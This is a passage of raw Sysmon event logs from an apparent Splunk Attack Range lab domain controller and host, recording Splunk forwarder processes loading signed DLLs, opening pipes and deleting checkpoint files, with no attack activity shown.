734700x800000000000000057345905Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:07.840{8B6011A9-5B7F-618E-46F3-04000000F101}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\advapi32.dll10.0.14393.4467 (rs1_release.210604-1844)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=A8CDCAC5C32D14ED8AADDF5489FC5D55,SHA256=140F07A8F6780DAFE20CC4FBE86C9332FB2F0C26ED8F49914BD05265C63EF6F1trueMicrosoft WindowsValid 734700x800000000000000057345904Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:07.840{8B6011A9-5B7F-618E-46F3-04000000F101}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\rpcrt4.dll10.0.14393.4467 (rs1_release.210604-1844)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=B0C4BF9491FB453B77399E3C56C11DC8,SHA256=66D5D1B3D25D15EA8737C8B2EF83E770BA10931868F24DCACC50936F0A0BAC08trueMicrosoft WindowsValid 734700x800000000000000057345903Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:07.840{8B6011A9-5B7F-618E-46F3-04000000F101}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=E6B98644CD3B912C44C39CC0996790A9,SHA256=23BE56E1B8DBA449C0959753175BD15457EC88E93E9E8B86489266347959A6F2trueMicrosoft WindowsValid 734700x800000000000000057345902Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:07.840{8B6011A9-5B7F-618E-46F3-04000000F101}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0trueMicrosoft WindowsValid 10341000x800000000000000057345901Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:07.840{8B6011A9-BB8B-618B-50A0-04000000F101}92124768C:\Windows\system32\conhost.exe{8B6011A9-5B7F-618E-46F3-04000000F101}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057345900Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:07.840{8B6011A9-5B7F-618E-46F3-04000000F101}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 734700x800000000000000057345899Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:07.840{8B6011A9-5B7F-618E-46F3-04000000F101}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 734700x800000000000000057345898Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:07.840{8B6011A9-5B7F-618E-46F3-04000000F101}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\ntdll.dll10.0.14393.4530 (rs1_release.210705-0736)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=36B87C41EE39F3051D116F735EBEF866,SHA256=9C45BAE6D7E27B3AE04BBF88B96686C04ED6A43695558E82B687013BA0383F8AtrueMicrosoft WindowsValid 734700x800000000000000057345897Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:07.840{8B6011A9-5B7F-618E-46F3-04000000F101}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exeMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3trueSplunk, Inc.Valid 10341000x800000000000000057345896Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:07.840{8B6011A9-8868-6164-0500-00000000F101}424440C:\Windows\system32\csrss.exe{8B6011A9-5B7F-618E-46F3-04000000F101}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000057345895Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:07.840{8B6011A9-BB8A-618B-4CA0-04000000F101}74521152C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{8B6011A9-5B7F-618E-46F3-04000000F101}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000057345894Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:07.826{8B6011A9-5B7F-618E-46F3-04000000F101}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{8B6011A9-886B-6164-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3{8B6011A9-BB8A-618B-4CA0-04000000F101}7452C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 18141800x800000000000000057345893Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:18:07.825{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x800000000000000057345892Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreatePipe2021-11-12 12:18:07.825{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x800000000000000057345891Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:18:07.825{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x800000000000000057345890Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreatePipe2021-11-12 12:18:07.825{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x800000000000000057345889Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:18:07.825{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x800000000000000057345888Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreatePipe2021-11-12 12:18:07.825{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 11241100x800000000000000057345887Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:07.156{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057345886Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:07.156{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=ED3DB46E9FF4A430B5B63F63E6F805F4,SHA256=EB6E756FA2D01CC99C15073129755B7A42CD59480128931596CD22EAAA8D001Efalsetrue 11241100x800000000000000057345885Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:07.125{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057345884Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:07.125{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=609985E38001FC322276CD504644B4C0,SHA256=B285DE0F2133BB95AC62E4CA7A4212FEE7034E9C905E9AD926B32E5822D600F9falsetrue 23542300x800000000000000021219732Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:07.643{AD5E2759-5433-6143-1200-00000000F101}292NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=F22457DEFF872D4E92D746F484E67C4E,SHA256=706123C678712660BEA19A59FD62E91B7A743AE461DFB5C42C260E85287B3821,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000021219731Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:07.266{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DB49F7C54B98EDB1F014020C7EBBA05C,SHA256=DD2A7F552A9FB6EB091ECD4CC222387ABD30F73326311A6EF7EDA20C9897BEE0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000021219730Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:07.266{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2B0213E9144B3D9E778446D62D3233B4,SHA256=7DEBAA8F0D3B4CD046B319639121D8B60C77AB4EEBFD80109A2758D25189AF7D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000021219743Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:08.721{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4FBFFE61C8919A76E0A503733115B474,SHA256=D0BB62280410D20BA5B0DAE8B4D7DB81A2663A6786682138144B0BCC3A46D4EA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 534500x800000000000000057346009Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:08.757{8B6011A9-5B80-618E-47F3-04000000F101}5088C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe 734700x800000000000000057346008Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:08.741{8B6011A9-5B80-618E-47F3-04000000F101}5088C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValid 734700x800000000000000057346007Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:08.741{8B6011A9-5B80-618E-47F3-04000000F101}5088C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\dbgcore.dll10.0.14321.1024 (debuggers(dbg).210127-1811)Windows Core Debugging HelpersMicrosoft® Windows® Operating SystemMicrosoftDBGCORE.DLLMD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146trueMicrosoft WindowsValid 734700x800000000000000057346006Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:08.741{8B6011A9-5B80-618E-47F3-04000000F101}5088C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\dbghelp.dll10.0.14321.1024 (rs1_release.160715-1616)Windows Image HelperMicrosoft® Windows® Operating SystemMicrosoftDBGHELP.DLLMD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1AtrueMicrosoft WindowsValid 11241100x800000000000000057346005Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:08.610{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057346004Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:08.610{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=25D435EA6EF52C0E5627DA5A40D961D6,SHA256=ADC9D4832AEBA2C0574F68F90D4F124662A1622CFB07486B9FEA26FE8F576B54falsetrue 734700x800000000000000057346003Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:08.541{8B6011A9-5B80-618E-47F3-04000000F101}5088C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FEtrueMicrosoft WindowsValid 734700x800000000000000057346002Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:08.541{8B6011A9-5B80-618E-47F3-04000000F101}5088C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\rsaenh.dll10.0.14393.4467 (rs1_release.210604-1844)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=28140830C342F475A597B2D54C42DFFA,SHA256=99E23D0177C6DC59AD72DEEC46CFB995828EF567F001261BC65532B6DDEAD862trueMicrosoft WindowsValid 734700x800000000000000057346001Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:08.541{8B6011A9-5B80-618E-47F3-04000000F101}5088C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778CtrueMicrosoft WindowsValid 18141800x800000000000000057346000Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:18:08.541{8B6011A9-5B80-618E-47F3-04000000F101}5088\srvsvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe 734700x800000000000000057345999Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:08.541{8B6011A9-5B80-618E-47F3-04000000F101}5088C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\srvcli.dll10.0.14393.0 (rs1_release.160715-1616)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=656F846CAED76C6FC5C76E8BACEF4EF6,SHA256=DFDE27C086764ACC1EA3E6A4E2BA50C2AB532F9E1D99203861F51910A8D850FBtrueMicrosoft WindowsValid 18141800x800000000000000057345998Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:18:08.541{8B6011A9-5B80-618E-47F3-04000000F101}5088\wkssvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe 734700x800000000000000057345997Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:08.541{8B6011A9-5B80-618E-47F3-04000000F101}5088C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\wkscli.dll10.0.14393.0 (rs1_release.160715-1616)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3DCBAE237E4E1F0EBE8E7DC053F778C4,SHA256=C3331CCBE71CC98A5F1BC013F1C0218FE194CA7B497DDF706BF9025AB5A7B330trueMicrosoft WindowsValid 734700x800000000000000057345996Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:08.541{8B6011A9-5B80-618E-47F3-04000000F101}5088C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923trueMicrosoft WindowsValid 734700x800000000000000057345995Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:08.541{8B6011A9-5B80-618E-47F3-04000000F101}5088C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\netapi32.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=F55166956AEAD05A141BA7E80B90AB7B,SHA256=B9BCF21D7F7E771C388C469B2611E8946166C62005B56D72421060DABFF7093FtrueMicrosoft WindowsValid 734700x800000000000000057345994Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:08.525{8B6011A9-5B80-618E-47F3-04000000F101}5088C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74trueMicrosoft WindowsValid 734700x800000000000000057345993Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:08.525{8B6011A9-5B80-618E-47F3-04000000F101}5088C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\msvcp140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationmsvcp140.dllMD5=BA72C2F6F465926980ADC2FB7F8B3490,SHA256=86881A7054532019291C162F0A8177980C1C2B45490F7E88543F22915D08D9FFtrueMicrosoft CorporationValid 734700x800000000000000057345992Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:08.525{8B6011A9-5B80-618E-47F3-04000000F101}5088C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\Wldap32.dll10.0.14393.3269 (rs1_release.190929-1234)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=12D6C3E8AC705BB42D377C05714F551C,SHA256=E67F6DB96F062A319312C365F1F55B2B38B0F90B77FFDA2522418709CBA45EB3trueMicrosoft WindowsValid 734700x800000000000000057345991Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:08.525{8B6011A9-5B80-618E-47F3-04000000F101}5088C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\vcruntime140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140.dllMD5=0C583614EB8FFB4C8C2D9E9880220F1D,SHA256=6CADB4FEF773C23B511ACC8B715A084815C6E41DD8C694BC70090A97B3B03FB9trueMicrosoft CorporationValid 734700x800000000000000057345990Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:08.525{8B6011A9-5B80-618E-47F3-04000000F101}5088C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\adsldpc.dll10.0.14393.0 (rs1_release.160715-1616)ADs LDAP Provider C DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationadsldpcMD5=F03FD7F523CFDBB96B0F3B8012FC161D,SHA256=8218E5AC2D7A52A2D50CD8D3CC8AA8CE4E37D1BDECFA62BC2637AA32A01CBA54trueMicrosoft WindowsValid 734700x800000000000000057345989Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:08.525{8B6011A9-5B80-618E-47F3-04000000F101}5088C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\winspool.drv10.0.14393.4169 (rs1_release.210107-1130)Windows Spooler DriverMicrosoft® Windows® Operating SystemMicrosoft Corporationwinspool.drvMD5=D21FAA584F844E61375D95B5BE9115EE,SHA256=E221EA0081FDE7AAAD71A38016A8D470082B3732E9ED2D8ED7C97E9F41AF0045trueMicrosoft WindowsValid 734700x800000000000000057345988Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:08.525{8B6011A9-5B80-618E-47F3-04000000F101}5088C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5trueMicrosoft WindowsValid 734700x800000000000000057345987Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:08.525{8B6011A9-5B80-618E-47F3-04000000F101}5088C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libeay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/libeay32.dllMD5=6445BD4247E3956B244772F3C415585F,SHA256=2B08FC9E160AD0F698226DA3E30A12551E8EBCCA1E7287E3915EC62B58151A78trueSplunk, Inc.Valid 734700x800000000000000057345986Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:08.525{8B6011A9-5B80-618E-47F3-04000000F101}5088C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75EtrueMicrosoft WindowsValid 734700x800000000000000057345985Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:08.525{8B6011A9-5B80-618E-47F3-04000000F101}5088C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\archive.dll-----MD5=98978F08A7A0D24C92FE8DC5287A8258,SHA256=CBB940A38E834C0BE44884C667863F76D6700D564043F90B3EB813370C3174E7trueSplunk, Inc.Valid 734700x800000000000000057345984Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:08.525{8B6011A9-5B80-618E-47F3-04000000F101}5088C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec-openssl.dll-----MD5=F30BB43EC30BE50400780223450492CD,SHA256=867D0453E285A5C29A4EFA039D2399662DCCAC98F88C46B0A41CEFB6B68DD836trueSplunk, Inc.Valid 734700x800000000000000057345983Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:08.525{8B6011A9-5B80-618E-47F3-04000000F101}5088C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=8AAF6E1B14B9210052FFF90E25926D63,SHA256=F2120C8E63EA94F8618B31319A534731C16D8FDD58B0E1E70217D72A39D78353trueMicrosoft WindowsValid 734700x800000000000000057345982Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:08.525{8B6011A9-5B80-618E-47F3-04000000F101}5088C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec.dll-----MD5=D98BAB348C28C8CFCC11EDB575E2557A,SHA256=ADA3F1256B175ECC390F126D2730D7A1AAB5A53F1AF205A7667D8010416602F9trueSplunk, Inc.Valid 734700x800000000000000057345981Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:08.525{8B6011A9-5B80-618E-47F3-04000000F101}5088C:\Program 